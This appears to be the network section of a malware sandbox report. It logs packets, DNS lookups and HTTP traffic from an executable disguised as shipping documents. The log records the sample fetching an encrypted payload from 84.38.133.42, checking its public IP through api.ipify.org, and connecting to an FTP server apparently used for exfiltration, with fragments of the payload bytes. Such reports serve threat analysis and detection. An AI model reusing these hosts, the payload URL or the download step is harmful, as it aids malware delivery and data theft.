Oct 31, 2024 11:40:49.026185036 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.026190996 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.026204109 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.026243925 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.027014971 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.027025938 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.027036905 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.027066946 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.027082920 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.027194977 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.027206898 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.027236938 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.027869940 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.027882099 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.027893066 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.027920008 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.027920008 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.027935982 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.027961969 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.028512001 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.028619051 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.028630018 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.028640985 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.028651953 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.028661013 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.028691053 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.029412985 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.029423952 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.029452085 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.029454947 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.029469013 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.029479980 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.029486895 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.029486895 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.029509068 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.030249119 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.030270100 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.030311108 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.030591011 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.030631065 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.030647993 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.030664921 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.030678034 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.030689955 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.030703068 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.030729055 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.031477928 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.031501055 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.031512976 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.031514883 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.031547070 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.031547070 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.032054901 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.032084942 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.032098055 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.032109022 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.032121897 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.032124996 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.032146931 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.032162905 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.032833099 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.032862902 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.032874107 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.032901049 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.032919884 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.032939911 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.032953024 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.032984972 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.033699036 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.033744097 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.033782005 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.033905029 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.033916950 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.033927917 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.033951998 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.033968925 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.034054041 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.034075975 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.034087896 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.034099102 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.034102917 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.034111023 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.034123898 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.034136057 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.034141064 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.034141064 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.034147978 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.034158945 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.034171104 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.034183979 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.034185886 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.034194946 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.034207106 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.034208059 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.034220934 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.034235954 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.034260988 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.034813881 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.034837008 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.034848928 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.034877062 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.034893036 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.124731064 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.124756098 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.124773979 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.124785900 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.124798059 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.124810934 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.124828100 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.124840975 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.124851942 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.124921083 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.124921083 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.125261068 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.125272036 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.125283003 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.125312090 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.125344038 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.125386000 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.125452042 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.125452995 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.125463963 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.125473976 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.125503063 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.125505924 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.125519991 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.125531912 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.125546932 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.125560045 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.125564098 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.125571966 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.125585079 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.125587940 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.125608921 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.125634909 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.125770092 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.125782013 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.125792027 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.125828981 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.125828981 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.126734018 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.126781940 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.126791954 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.126805067 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.126833916 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.126833916 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.126844883 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.126858950 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.126871109 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.126882076 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.126900911 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.126921892 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.126952887 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.126962900 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.126992941 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.127005100 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.127007008 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.127016068 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.127027988 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.127038002 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.127051115 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.127053976 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.127053976 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.127068996 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.127074003 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.127083063 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.127094984 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.127098083 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.127124071 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.127124071 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.127165079 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.127202988 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.127247095 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.127263069 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.127274990 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.127290964 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.127342939 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.127342939 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.127407074 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.127418995 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.127429962 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.127465963 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.127476931 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.127486944 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.127497911 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.127509117 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.127511024 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.127511024 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.127545118 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.127546072 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.127724886 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.127738953 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.127749920 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.127784014 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.127821922 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:50.259217978 CET	56195	443	192.168.2.5	172.67.74.152
Oct 31, 2024 11:40:50.259279966 CET	443	56195	172.67.74.152	192.168.2.5
Oct 31, 2024 11:40:50.259368896 CET	56195	443	192.168.2.5	172.67.74.152
Oct 31, 2024 11:40:50.270169973 CET	56195	443	192.168.2.5	172.67.74.152
Oct 31, 2024 11:40:50.270204067 CET	443	56195	172.67.74.152	192.168.2.5
Oct 31, 2024 11:40:51.147990942 CET	443	56195	172.67.74.152	192.168.2.5
Oct 31, 2024 11:40:51.148086071 CET	56195	443	192.168.2.5	172.67.74.152
Oct 31, 2024 11:40:51.150186062 CET	56195	443	192.168.2.5	172.67.74.152
Oct 31, 2024 11:40:51.150208950 CET	443	56195	172.67.74.152	192.168.2.5
Oct 31, 2024 11:40:51.150500059 CET	443	56195	172.67.74.152	192.168.2.5
Oct 31, 2024 11:40:51.192576885 CET	56195	443	192.168.2.5	172.67.74.152
Oct 31, 2024 11:40:51.210159063 CET	56195	443	192.168.2.5	172.67.74.152
Oct 31, 2024 11:40:51.251365900 CET	443	56195	172.67.74.152	192.168.2.5
Oct 31, 2024 11:40:51.386362076 CET	443	56195	172.67.74.152	192.168.2.5
Oct 31, 2024 11:40:51.386442900 CET	443	56195	172.67.74.152	192.168.2.5
Oct 31, 2024 11:40:51.386503935 CET	56195	443	192.168.2.5	172.67.74.152
Oct 31, 2024 11:40:51.392714977 CET	56195	443	192.168.2.5	172.67.74.152
Oct 31, 2024 11:40:52.884023905 CET	56196	21	192.168.2.5	192.185.13.234
Oct 31, 2024 11:40:52.888871908 CET	21	56196	192.185.13.234	192.168.2.5
Oct 31, 2024 11:40:52.888950109 CET	56196	21	192.168.2.5	192.185.13.234
Oct 31, 2024 11:40:52.895241022 CET	56196	21	192.168.2.5	192.185.13.234
Oct 31, 2024 11:40:52.900490999 CET	21	56196	192.185.13.234	192.168.2.5
Oct 31, 2024 11:40:52.900572062 CET	56196	21	192.168.2.5	192.185.13.234

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 31, 2024 11:39:20.539854050 CET	53	65074	1.1.1.1	192.168.2.5
Oct 31, 2024 11:40:50.234553099 CET	56491	53	192.168.2.5	1.1.1.1
Oct 31, 2024 11:40:50.242856026 CET	53	56491	1.1.1.1	192.168.2.5
Oct 31, 2024 11:40:52.517667055 CET	62072	53	192.168.2.5	1.1.1.1
Oct 31, 2024 11:40:52.882674932 CET	53	62072	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 31, 2024 11:40:50.234553099 CET	192.168.2.5	1.1.1.1	0xa3ca	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Oct 31, 2024 11:40:52.517667055 CET	192.168.2.5	1.1.1.1	0xc816	Standard query (0)	ftp.concaribe.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 31, 2024 11:40:50.242856026 CET	1.1.1.1	192.168.2.5	0xa3ca	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Oct 31, 2024 11:40:50.242856026 CET	1.1.1.1	192.168.2.5	0xa3ca	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Oct 31, 2024 11:40:50.242856026 CET	1.1.1.1	192.168.2.5	0xa3ca	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Oct 31, 2024 11:40:52.882674932 CET	1.1.1.1	192.168.2.5	0xc816	No error (0)	ftp.concaribe.com	concaribe.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 31, 2024 11:40:52.882674932 CET	1.1.1.1	192.168.2.5	0xc816	No error (0)	concaribe.com		192.185.13.234	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.ipify.org

84.38.133.42

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	56194	84.38.133.42	80	6496	C:\Users\user\Desktop\Shipping documents 000293994900.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 11:40:47.722033024 CET	175	OUT	GET /FZBmQQQpasdj30.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: 84.38.133.42 Cache-Control: no-cache
Oct 31, 2024 11:40:48.544364929 CET	1236	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Thu, 31 Oct 2024 05:54:00 GMT Accept-Ranges: bytes ETag: "6e807b48592bdb1:0" Server: Microsoft-IIS/8.5 Date: Thu, 31 Oct 2024 10:40:46 GMT Content-Length: 241728 Data Raw: 62 d8 9e 6a 8e 70 46 f2 66 aa d7 46 f3 5a 14 7b 59 9b d2 74 e5 47 20 b0 06 5f 2e a2 a6 0a 86 ce 0b a3 df da b5 db 62 20 8f 0e 3f ec c4 a5 1a df 5f c6 f2 d8 69 ee 5a 4f 94 54 dc 42 71 ae b7 09 fc 13 c0 e7 5e f2 ed 02 3e ad b3 c4 94 4c 9b 72 71 b3 67 af 51 ad 09 78 e6 b0 31 e0 a9 bc 4c 92 a7 fa 79 93 4c 48 a3 e3 7c c9 a4 07 8f 5c 77 95 d4 64 5d 5e b8 4c 0f 70 34 5d 3a e3 97 a3 78 a5 6f 7f a3 b8 3c d0 e1 29 93 58 94 c9 44 bb 79 11 1e 98 b8 7c b2 fc 24 0a 92 b3 9c b0 89 cf fe a6 5c 87 fc 53 b8 54 b2 63 20 ff 00 0b 53 22 cc e6 42 52 19 09 46 2c ec ee 40 e9 9a d5 68 4c b8 2e 57 a9 a3 99 9c 93 57 72 3f de 8c 9f 53 df 9d 07 4f e6 8d 71 5c f7 5b d8 1e c9 4b 95 76 7d 98 26 fe 66 ee 86 95 d0 db 74 71 b7 59 db 1a 7d 20 e1 08 e7 05 7a ce ec 34 e3 64 ca 3c 79 9b da 91 57 b2 ae 99 4f 20 65 23 f6 e2 3b ee d7 8d f4 4c c1 3f 6d d5 3a d5 d3 85 b1 d2 37 d0 35 54 36 95 7f 19 60 25 c0 fe 34 39 06 ec 5f 15 eb c7 f3 4c 7a 16 41 6c a9 4e 99 1a ed 8b 87 5b 38 79 02 98 ac ed 66 fe f7 7b 06 a4 45 9c cd b7 5d 4d 4d 60 67 6b 82 [TRUNCATED] Data Ascii: bjpFfFZ{YtG _.b ?_iZOTBq^>LrqgQx1LyLH\|\wd]^Lp4]:xo<)XDy\|$\STc S"BRF,@hL.WWr?SOq\[Kv}&ftqY} z4d<yWO e#;L?m:75T6`%49_LzAlN[8yf{E]MM`gkM9d(f-p\|\,ZBr/g\gL]KYcw6KRB.EEdZC{D(9NT\>a@jWCk#A?xG~;pj{5$Hm:mW0,"Lv"DH3c)~B+bpt)F^g6;]"l+@6!1$ubY42KR9dd2O$`^lPv(FdDbp(*O#=u~UeFGw<6Giv"1}zkff=RP7si]sXqH<'#J1Dv1K$`r5nD'90<E_h6tWy<2@n&w>fTsrD&5:=oH#$$RK$W]V
Oct 31, 2024 11:40:48.544387102 CET	1236	IN	Data Raw: 92 d8 aa 50 02 08 c5 34 2a c0 1a 8e d8 d8 ae 59 6c a8 bd a8 22 44 db 77 44 b3 21 53 ad fe 95 dd 19 97 41 71 d1 18 2a 56 74 d2 56 de 10 4e d5 14 1e 55 c3 c4 f9 e6 13 3e b8 04 ce 24 c7 aa 24 50 86 29 25 17 5f 1e 8d 22 b1 27 83 05 c8 3c d9 9b 54 b0 Data Ascii: P4Yl"DwD!SAqVtVNU>$$P)%_"'<TZC;Ybs T cvO)X\j=]T&1{Q54\u01/O~$Ny\$J y@eTi \|)[/,*JqD]k?-]Qn
Oct 31, 2024 11:40:48.544399023 CET	1236	IN	Data Raw: a8 37 8a e1 73 6a 86 d5 c5 78 31 16 91 30 3f af 5a 8c 95 30 69 bf 85 90 07 e5 67 5c 61 3e 90 8a ee 46 4c d5 59 80 69 5b 60 0a 8e e3 9c 32 fd ca 02 d9 06 4b 72 48 98 54 c2 28 ee 35 4c 2f d4 a8 5c d4 5d 06 20 27 fa 91 40 02 fc 16 8a 7b 61 ce d3 b1 Data Ascii: 7sjx10?Z0ig\a>FLYi[`2KrHT(5L/\] '@{a8 K\n6UcjUkg)wV?QYy~;\|s7QliW&$sW6Ni"CF8eA~B'Khvh%`X
Oct 31, 2024 11:40:48.544409990 CET	636	IN	Data Raw: 94 24 9f b0 c6 35 f0 ce ab 02 61 01 ab 51 f0 7e fc f6 e1 8b 5a 99 33 1b e5 14 d7 5e e4 3c 07 3e 54 3f 8f 1a 33 68 e0 59 2b f2 49 fb c1 4d f3 a4 72 40 14 b2 0c 76 e6 4c 0e 79 b8 3c 68 d2 4f 97 5e b4 1f e8 34 46 2e 7f 1c 44 23 a8 3d fd b9 02 7a 37 Data Ascii: $5aQ~Z3^<>T?3hY+IMr@vLy<hO^4F.D#=z7V>ogL"A\|=7tx+Q^P1#ad]py"X?65ifwz72<_Ufvn]"vai\2TwN#B\5T
Oct 31, 2024 11:40:48.544421911 CET	1236	IN	Data Raw: 1b ae 35 b0 e1 70 11 13 d6 ed 3a 19 5c 95 32 32 ad 21 da 96 42 76 b5 a7 e2 2c 71 3b 5d 67 10 a4 f2 97 dd 31 88 5c aa 4f 5b 67 0a 48 e2 9c 32 d5 85 7d ae 14 4b 76 40 94 22 38 69 ef 45 60 e8 7a aa 59 91 6b 04 5b b4 e2 cb 95 55 bf 15 89 02 fa cc a8 Data Ascii: 5p:\22!Bv,q;]g1\O[gH2}Kv@"8iE`zYk[U8>p9_64.b!@JFcmn#=?wG~;x6Mjv?2iA3Im]3,"Hv"TFBcNJk}bp3
Oct 31, 2024 11:40:48.544431925 CET	212	IN	Data Raw: b4 29 24 ef 98 d8 30 f0 c4 2b 5e 54 01 af 7a 10 72 86 24 1f 87 5f b3 31 19 e6 69 05 2c bf 38 2d 50 f4 ba 50 1b 33 4c cb 7b 29 f1 4a 2d c1 4d f3 fc 65 42 6f 19 7e 7b e2 66 5c 14 ae 41 b3 d8 ed 6d 78 ab 1d b3 ea 46 2e 7b 44 77 21 ab 30 83 47 0e 7f Data Ascii: )$0+^Tzr$_1i,8-PP3L{)J-MeBo~{f\AmxF.{Dw!0GhE<Ee-PTzQ[K(#bf\|s"x@F~eEe\|E*94LY`.hqRhN[wj
Oct 31, 2024 11:40:48.659996986 CET	1236	IN	Data Raw: d2 5d 36 7e 24 9f 71 71 a6 08 be 11 09 87 cd ee a6 09 b5 78 42 f2 5e c4 d3 7e aa c2 d5 dc 98 c3 31 80 bc de 36 1e 2f 49 cb 31 76 1f a4 a0 65 2f 52 ff e5 df 2c a5 2c 76 bb 4f 2b e7 ad f0 9e c6 41 33 56 32 bf 4a 30 22 10 87 91 be 90 e9 b4 d1 b1 d2 Data Ascii: ]6~$qqxB^~16/I1ve/R,,vO+A3V2J0"2ieva"@`aV<9CyOEP}: ke\|T)x1$LuLh\|\}kb]J]:?xk9dH-@xB27$&r[n+g
Oct 31, 2024 11:40:48.660048962 CET	1236	IN	Data Raw: d8 44 dd bf a8 90 9f 10 85 88 8c dc e4 03 12 f7 40 f6 04 17 d5 db d0 65 98 99 ff d8 36 6a da 23 99 98 24 3a 46 ca 79 5a fb 21 4d 20 8d 17 ea ef 3c 54 41 99 e5 40 a8 d6 41 0b 3f ae ee a5 e0 39 d6 46 12 47 05 6f d1 15 27 40 14 1b 7b a1 d4 40 88 3f Data Ascii: D@e6j#$:FyZ!M <TA@A?9FGo'@{@?(\Gq~\R$Td3:8>{{nBoXM:G\##1Mnak7K1/c9O(S;K>f<~]v=/Fw^**;!P
Oct 31, 2024 11:40:48.660062075 CET	424	IN	Data Raw: af c4 bc 6e ef 77 0d 32 2c 22 b2 6b c9 65 02 c7 d6 de 97 9d a9 e0 cf 69 90 ec d2 64 b7 46 48 33 57 a7 97 63 29 e9 af ab dc 5e 43 8f 0d 2b b7 6a 32 e2 83 fd c7 2f fc 62 70 a8 5a f2 03 b8 8e c9 d1 d8 f3 df 1a dd 77 29 03 13 cf b7 9e 7e 8c c0 46 7e Data Ascii: nw2,"keidFH3Wc)^C+j2/bpZw)~F~g6d"#xn[3!1vbLUCzQ>,:%_#&e2(*@F_J\|^A6 _m3hPdh\UR~}vOUy<1LeU+q
